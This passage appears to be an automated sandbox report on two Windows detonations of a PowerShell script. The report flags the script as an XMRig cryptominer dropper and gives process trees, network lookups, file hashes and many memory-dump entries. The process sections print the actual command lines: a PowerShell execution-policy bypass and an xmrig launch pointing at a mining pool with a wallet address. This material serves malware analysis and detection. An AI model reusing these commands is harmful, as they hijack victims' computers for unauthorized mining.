memory/2220-50-0x000001A392FC0000-0x000001A392FE0000-memory.dmp
memory/764-51-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
memory/764-53-0x00007FFAF1663000-0x00007FFAF1665000-memory.dmp
memory/2220-52-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-54-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-55-0x000001A392FA0000-0x000001A392FC0000-memory.dmp
memory/2220-56-0x000001A392FC0000-0x000001A392FE0000-memory.dmp
memory/2220-57-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-58-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-59-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-60-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-61-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-62-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-63-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-64-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-65-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-66-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-67-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-68-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-69-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-70-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-71-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-72-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-73-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-74-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-75-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-76-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-77-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-78-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-79-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-80-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-81-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-82-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-83-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-84-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-85-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-86-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-87-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-88-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-89-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-90-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-91-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-92-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-93-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-94-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-95-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-96-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-97-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-98-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-99-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-100-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-101-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-102-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-103-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-104-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-105-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-106-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-107-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-108-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-109-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-110-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-111-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-112-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-113-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-114-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-115-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-116-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:57
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2564 wrote to memory of 2156 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2564 wrote to memory of 2156 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4176,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3912 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4364,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
Files
memory/2564-0-0x00007FFDD4233000-0x00007FFDD4235000-memory.dmp
memory/2564-1-0x0000022B70E70000-0x0000022B70E92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ztd31wmj.3sb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2564-11-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2564-12-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2564-14-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2564-15-0x0000022B73090000-0x0000022B730A2000-memory.dmp
memory/2564-16-0x0000022B70EC0000-0x0000022B70ECA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2156-47-0x000001590B9C0000-0x000001590B9E0000-memory.dmp
memory/2156-48-0x000001590BA00000-0x000001590BA20000-memory.dmp
memory/2156-49-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-50-0x000001590BA20000-0x000001590BA40000-memory.dmp
memory/2564-51-0x00007FFDD4233000-0x00007FFDD4235000-memory.dmp
memory/2564-52-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2156-53-0x000001590BA40000-0x000001590BA60000-memory.dmp
memory/2156-54-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2564-55-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2156-56-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-58-0x000001590BA20000-0x000001590BA40000-memory.dmp
memory/2156-57-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-59-0x000001590BA40000-0x000001590BA60000-memory.dmp
memory/2156-60-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-61-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-62-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-63-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-64-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-65-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-66-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-67-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-68-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-69-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-70-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-71-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-72-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-73-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-74-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-75-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-76-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-77-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-78-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-79-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-80-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-81-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-82-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-83-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-84-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-85-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-86-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-87-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-88-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-89-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-90-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-91-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-92-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-93-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-94-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-95-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-96-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-97-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-98-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-99-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-100-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-101-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-102-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-103-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-104-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-105-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-106-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-107-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-108-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-109-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-110-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-111-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-112-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-113-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-114-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-115-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-116-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-117-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-118-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:24
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1759s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2676 wrote to memory of 2516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2676 wrote to memory of 2516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/2676-3-0x00007FFA5ED73000-0x00007FFA5ED74000-memory.dmp
memory/2676-5-0x000002508E2C0000-0x000002508E2E2000-memory.dmp
memory/2676-8-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2676-9-0x00000250A6960000-0x00000250A69D6000-memory.dmp
memory/2676-10-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hlwluwm.prp.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2676-25-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2676-48-0x000002508E370000-0x000002508E382000-memory.dmp
memory/2676-61-0x000002508E340000-0x000002508E34A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2516-90-0x0000020679870000-0x0000020679890000-memory.dmp
memory/2516-91-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2676-92-0x00007FFA5ED73000-0x00007FFA5ED74000-memory.dmp
memory/2516-93-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2676-94-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2676-95-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2676-96-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2516-97-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-98-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-99-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-100-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-101-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-102-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-103-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-104-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-105-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-106-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-107-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-108-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-109-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-110-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-111-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-112-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-113-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-114-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-115-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
